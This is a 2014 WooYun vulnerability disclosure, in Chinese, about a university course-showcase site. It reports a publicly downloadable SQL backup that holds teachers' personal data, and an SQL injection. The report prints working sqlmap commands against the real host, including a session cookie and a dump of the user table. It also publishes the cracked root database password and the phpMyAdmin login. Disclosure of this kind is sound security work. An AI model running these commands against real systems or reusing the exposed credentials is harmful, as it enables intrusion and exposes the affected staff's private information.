漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071588
漏洞标题:湖北中医药大学某系统备份数据可下载+SQL注入
相关厂商:CCERT教育网应急响应组
漏洞作者: 蓝色水晶球
提交时间:2014-08-08 17:48
修复时间:2014-08-13 17:50
公开时间:2014-08-13 17:50
漏洞类型:系统/服务运维配置不当
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
1. 数据库备份数据可直接下载,其中包含教师姓名,出生年月,联系方式,邮箱等敏感信息。
2. 存在SQL注入
详细说明:
偶然间用搜索引擎搜到该网站的SQL数据,用IE访问根本转不动!当时以为该网站不能正常访问,准备放弃时,将该文件用迅雷下载。好家伙,74MB,难怪没反应了。翻了翻,该数据是2013年备份的。
漏洞证明:
输入http://npe.hbtcm.edu.cn/databackup/huaqin_database_backup_%202013_2_8_03_23_28.sql
从上图看网站好像已经被黑阔踩过点了
通篇都是弱密码123456
里面有教师姓名、出生年月、电话、邮箱等敏感信息。数据库里共18950条记录。
根据获得用户口令登录系统
系统多处存在SQL注入,例如http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965,注入点为id,用SQLMAP跑
sqlmap -u "http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965" -p id --cookie="PHPSESSID=im46qafuhardvo68v9vkq5omj0" --dbms mysql --dbs
懒得用SQLMAP一个个的导了,直接获取数据库root密码
sqlmap -u "http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965" -p id --cookie="PHPSESSID=im46qafuhardvo68v9vkq5omj0" --dbms mysql -D mysql -T user --dump
数据库root密码:CBEEB782C86AED5957C30DFF0F755C709AA9BEBA,破解后得出51tekhantang
http://npe.hbtcm.edu.cn/phpmyadmin后,输入root/51tekhantang,就可以对数据库进行可视化操作了
修复方案:
虽然该系统仅用来展示精品课程,也不该将数据库备份数据放在公网任人下载啊,里面还有很多老师的个人信息呢。该网站与学校的其他网站处于同一网段,完全可以将这个网站作为跳板渗透到学校内部,我就不实验了。
修复:
1、删除备份数据
2、过滤,解决SQL注入。
版权声明:转载请注明来源 蓝色水晶球@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-08-13 17:50
厂商回复:
最新状态:
暂无